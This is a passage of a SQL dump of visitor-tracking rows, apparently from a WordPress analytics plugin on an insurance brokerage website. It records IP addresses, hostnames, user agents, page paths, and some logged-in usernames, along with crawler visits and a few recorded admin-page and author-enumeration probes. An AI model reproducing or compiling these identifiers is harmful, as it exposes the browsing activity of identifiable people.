Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(19518,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167903','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/meet-the-eib-team/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19521,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167908','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19523,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167911','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19524,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167913','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19526,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167915','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19529,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167917','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19530,'0b_1252cf70b9c467ea3f5344eea8514329','1461167996','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19532,'0b_1252cf70b9c467ea3f5344eea8514329','1461167997','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19535,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461168116','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19536,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461168123','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19538,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461168125','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19541,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461168126','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19542,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461168132','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(19545,'0b_b4689038261f8d8980ed86937a425ac1','1461168234','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(19548,'0b_b4689038261f8d8980ed86937a425ac1','1461168245','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19550,'0b_b4689038261f8d8980ed86937a425ac1','1461168249','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19551,'0b_cb8479902fd3bbd07e10621be8c2bd0e','1461168484','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(19554,'0b_b91e2314bbf59862a42b2fa920df2064','1461168713','178.63.86.11','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(19556,'0b_b91e2314bbf59862a42b2fa920df2064','1461168715','178.63.86.11','majestic12.co.uk','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(19559,'0b_b91e2314bbf59862a42b2fa920df2064','1461168717','178.63.86.11','majestic12.co.uk','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(19562,'0b_b91e2314bbf59862a42b2fa920df2064','1461168719','178.63.86.11','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(19565,'0b_066fa15bb70d09bf0dab89bc38541b69','1461170464','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19568,'0b_b4689038261f8d8980ed86937a425ac1','1461170464','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19571,'0b_066fa15bb70d09bf0dab89bc38541b69','1461170466','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19572,'0b_b4689038261f8d8980ed86937a425ac1','1461170470','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19574,'0b_154eab5a101797fc086eedba90abef91','1461171713','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19577,'0b_5b9f29b589c85a768ae29954798c2bf9','1461171961','67.83.100.17','ool-43536411.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(19580,'0b_5b9f29b589c85a768ae29954798c2bf9','1461171963','67.83.100.17','ool-43536411.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(19583,'0b_5b9f29b589c85a768ae29954798c2bf9','1461172026','67.83.100.17','ool-43536411.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(19586,'0b_fd6a46f103e30d4953168d7b4ce3b1d7','1461172148','91.210.147.104','104.147.dynamic.pppoe.fregat.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ru','','','','','','','0','0',0),(19589,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461172808','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(19592,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461172811','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(19595,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461172919','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(19598,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461172920','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(19599,'0b_7c93bbc6e11b06f05fec4e1a015d2368','1461172944','180.76.15.151','baiduspider-180-76-15-151.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(19602,'0b_e9e4ccbe4e7f30fe7dd528d98039b073','1461172955','180.76.15.22','baiduspider-180-76-15-22.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(19604,'0b_9c1e8bd74d974cc382f9b233d16490bd','1461173062','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(19605,'0b_3ab67f6af352ecd26f14e6f0ee88cb11','1461173095','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19608,'0b_9d3a2476f1783114b989197ac32bc9e4','1461174213','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(19610,'0b_9d3a2476f1783114b989197ac32bc9e4','1461174222','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(19613,'0b_9d3a2476f1783114b989197ac32bc9e4','1461174233','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(19616,'0b_b4689038261f8d8980ed86937a425ac1','1461174720','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(19619,'0b_b4689038261f8d8980ed86937a425ac1','1461174735','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19620,'0b_a594fef29b7ad78384151f8d0e91c7ec','1461177194','157.55.39.43','msnbot-157-55-39-43.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19623,'0b_a594fef29b7ad78384151f8d0e91c7ec','1461177232','157.55.39.43','msnbot-157-55-39-43.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19625,'0b_e981770c313663d8d0c513dece8c9aa3','1461177650','66.249.83.150,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(19626,'0b_4fc4304d4a727ab57b9c59a121b16b0f','1461177650','64.233.172.181,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(19629,'0b_e223348c293c003ba4ee69098f598a6c','1461177915','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19632,'0b_e223348c293c003ba4ee69098f598a6c','1461177916','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19635,'0b_b824f986b6471bfb4df95026e854b50b','1461177989','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19638,'0b_b824f986b6471bfb4df95026e854b50b','1461177992','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19640,'0b_99ab887cfbaaa56d005d2f94ae9af1d7','1461178259','66.249.64.24','crawl-66-249-64-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19643,'0b_99ab887cfbaaa56d005d2f94ae9af1d7','1461178260','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19646,'0b_3a9b2d6196355afde2ddb452d2271590','1461179228','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19649,'0b_c38ecc2beff7e33946751274f1d31bbf','1461179237','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19652,'0b_e4d1e6ae6e7415b9e511eb5bcd3d29e7','1461180155','157.55.39.204','msnbot-157-55-39-204.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19655,'0b_e4d1e6ae6e7415b9e511eb5bcd3d29e7','1461180162','157.55.39.204','msnbot-157-55-39-204.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19656,'0b_4c1e5e3ff242f34871f2e9fae354dd32','1461182730','207.46.13.2','msnbot-207-46-13-2.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19659,'0b_79b00ba310ba215a4565633a0ebada21','1461182758','157.55.39.140','msnbot-157-55-39-140.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19661,'0b_b4689038261f8d8980ed86937a425ac1','1461184243','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(19662,'0b_b4689038261f8d8980ed86937a425ac1','1461184277','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19664,'0b_bec6b86fc2dc33627850d41e8fcf9f37','1461184460','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(19665,'0b_bec6b86fc2dc33627850d41e8fcf9f37','1461184460','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(19667,'0b_bec6b86fc2dc33627850d41e8fcf9f37','1461184462','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(19670,'0b_bec6b86fc2dc33627850d41e8fcf9f37','1461184465','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(19673,'0b_bec6b86fc2dc33627850d41e8fcf9f37','1461184468','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(19674,'0b_ccda58b2bc4c7b45f9867304cd607821','1461184575','138.201.16.71','static.71.16.201.138.clients.your-server.de','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208','','',0,'WinXP','Mozilla 1','ru','','','','','','','0','0',0),(19677,'0b_0c79a67919abeb5a1df2f0006a9539b5','1461184861','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','0',0),(19679,'0b_0c79a67919abeb5a1df2f0006a9539b5','1461184862','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','0',0),(19680,'0b_0c79a67919abeb5a1df2f0006a9539b5','1461184867','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(19683,'0b_112e529a0dc853300e4745d9755ded17','1461184938','47.23.66.242','ool-2f1742f2.static.optonline.net','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','us','1440 x 900','','','','','','0','0',0),(19686,'0b_112e529a0dc853300e4745d9755ded17','1461184939','47.23.66.242','ool-2f1742f2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/','',0,'Win7','IE 9','us','1440 x 900','','','','','','0','0',0),(19689,'0b_112e529a0dc853300e4745d9755ded17','1461185011','47.23.66.242','ool-2f1742f2.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/','',0,'Win7','IE 9','us','1440 x 900','','','','','','0','0',0),(19691,'0b_112e529a0dc853300e4745d9755ded17','1461185102','47.23.66.242','ool-2f1742f2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7','IE 9','us','1440 x 900','','','','','','0','51',0),(19692,'0b_112e529a0dc853300e4745d9755ded17','1461185173','47.23.66.242','ool-2f1742f2.static.optonline.net','/members/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19694,'0b_112e529a0dc853300e4745d9755ded17','1461185223','47.23.66.242','ool-2f1742f2.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/members/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19697,'0b_10b9621027096e64aad44d89360a5808','1461185219','188.166.49.251','188.166.49.251','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(19700,'0b_10b9621027096e64aad44d89360a5808','1461185229','188.166.49.251','188.166.49.251','/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(19703,'0b_10b9621027096e64aad44d89360a5808','1461185244','188.166.49.251','188.166.49.251','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(19706,'0b_112e529a0dc853300e4745d9755ded17','1461185256','47.23.66.242','ool-2f1742f2.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19707,'0b_10b9621027096e64aad44d89360a5808','1461185253','188.166.49.251','188.166.49.251','/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(19709,'0b_744ae177f4a0c385adee4cdeecb6c660','1461185791','157.55.39.43','msnbot-157-55-39-43.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19710,'0b_6c9ab1248b74a5c931c61cf03870ae93','1461186092','108.2.197.110','pool-108-2-197-110.phlapa.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empire+brokerage&form=PRHPCM&pc=EUPP_CMDTDFJS&mkt=en-us&refig=ff4b4f2c86ba42448adeaa2cc1b8e111&pq=empire+brokerage&sc=3-16&sp=-1&qs=n&sk=&cvid=ff4b4f2c86ba42448adeaa2cc1b8e111','empire brokerage',1,'Win10','','us','','Bing','','','','','0','0',0),(19713,'0b_6c9ab1248b74a5c931c61cf03870ae93','1461186095','108.2.197.110','pool-108-2-197-110.phlapa.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','','','','','','','0','0',0),(19716,'0b_4e47d3b56231a24a2820afa65450ff97','1461186242','157.55.39.43','msnbot-157-55-39-43.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19718,'0b_c3503db663e84acf2a86c60aca514874','1461186247','199.30.24.65','msnbot-199-30-24-65.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(19721,'0b_f9c2be0e8743fea60d788640ef912d48','1461186694','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19724,'0b_f9c2be0e8743fea60d788640ef912d48','1461186695','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 